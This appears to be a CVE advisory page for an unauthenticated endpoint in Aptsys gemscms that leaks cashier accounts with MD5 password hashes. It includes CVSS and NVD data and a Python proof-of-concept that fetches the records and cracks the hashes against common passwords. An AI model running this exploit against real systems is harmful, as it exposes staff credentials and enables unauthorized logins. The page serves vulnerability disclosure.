Security Vulnerability Report
CVE-2025-52026 CVSS 7.5 HIGH

CVE-2025-52026

Published: 2026-01-23 21:15:51
Last Modified: 2026-02-12 16:48:22

Description

An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform through 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, usernames, and passwords hashed using MD5. As MD5 is a broken cryptographic function, the hashes can be easily reversed using public tools, exposing user credentials in plaintext. This allows remote attackers to perform unauthorized logins and potentially gain access to sensitive POS operations or backend functions.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:* - VULNERABLE
Aptsys gemscms <= 2025-05-28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json
import hashlib

# CVE-2025-52026 PoC - Unauthenticated Information Disclosure
# Target: Aptsys gemscms /srvs/membersrv/getCashiers endpoint

def exploit_cve_2025_52026(target_url):
    """
    Exploit for CVE-2025-52026
    This PoC demonstrates the unauthenticated access to cashier accounts
    """
    # Target endpoint
    endpoint = f"{target_url}/srvs/membersrv/getCashiers"

    print(f"[*] Targeting: {endpoint}")
    print(f"[*] Exploiting CVE-2025-52026...")

    try:
        # Send unauthenticated request
        response = requests.get(endpoint, timeout=10)

        if response.status_code == 200:
            data = response.json()
            print(f"[+] Success! Retrieved {len(data)} cashier accounts")
            print("\n[+] Cashier Data:")
            print(json.dumps(data, indent=2, ensure_ascii=False))

            # Attempt MD5 hash cracking for each account
            print("\n[*] Attempting MD5 hash cracking...")
            for account in data:
                if 'password_hash' in account:
                    password = crack_md5(account['password_hash'])
                    if password:
                        print(f"[+] Cracked: {account.get('username', 'N/A')} -> {password}")

            return data
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def crack_md5(md5_hash):
    """
    Attempt to crack MD5 hash using common password list
    Note: For educational purposes only
    """
    common_passwords = [
        '123456', 'password', '12345678', 'qwerty', 'admin',
        '123456789', 'letmein', 'welcome', 'monkey', '1234567',
        '12345', '1234', 'password1', 'admin123', 'root',
        '111111', '123123', 'pass', 'test', 'changeme'
    ]

    for pwd in common_passwords:
        if hashlib.md5(pwd.encode()).hexdigest() == md5_hash:
            return pwd
    return None

if __name__ == "__main__":
    # Example usage
    target = "https://vulnerable-server.com"
    exploit_cve_2025_52026(target)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52026", "sourceIdentifier": "[email protected]", "published": "2026-01-23T21:15:50.813", "lastModified": "2026-02-12T16:48:21.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, usernames, and passwords hashed using MD5. As MD5 is a broken cryptographic function, the hashes can be easily reversed using public tools, exposing user credentials in plaintext. This allows remote attackers to perform unauthorized logins and potentially gain access to sensitive POS operations or backend functions."}, {"lang": "es", "value": "Existe una vulnerabilidad de revelación de información en el endpoint /srvs/membersrv/getCashiers de la plataforma de backend Aptsys gemscms hasta el 28-05-2025. Este endpoint no autenticado devuelve una lista de cuentas de cajero, incluyendo nombres, direcciones de correo electrónico, nombres de usuario y contraseñas hasheadas usando MD5. Dado que MD5 es una función criptográfica rota, los hashes pueden ser fácilmente revertidos usando herramientas públicas, exponiendo las credenciales de usuario en texto plano. Esto permite a atacantes remotos realizar inicios de sesión no autorizados y potencialmente obtener acceso a operaciones POS sensibles o funciones de backend."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-05-28", "matchCriteriaId": "1F83E13A-9AF7-4E42-9849-9D9684967078"}]}]}], "references": [{"url": "http://aptsys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}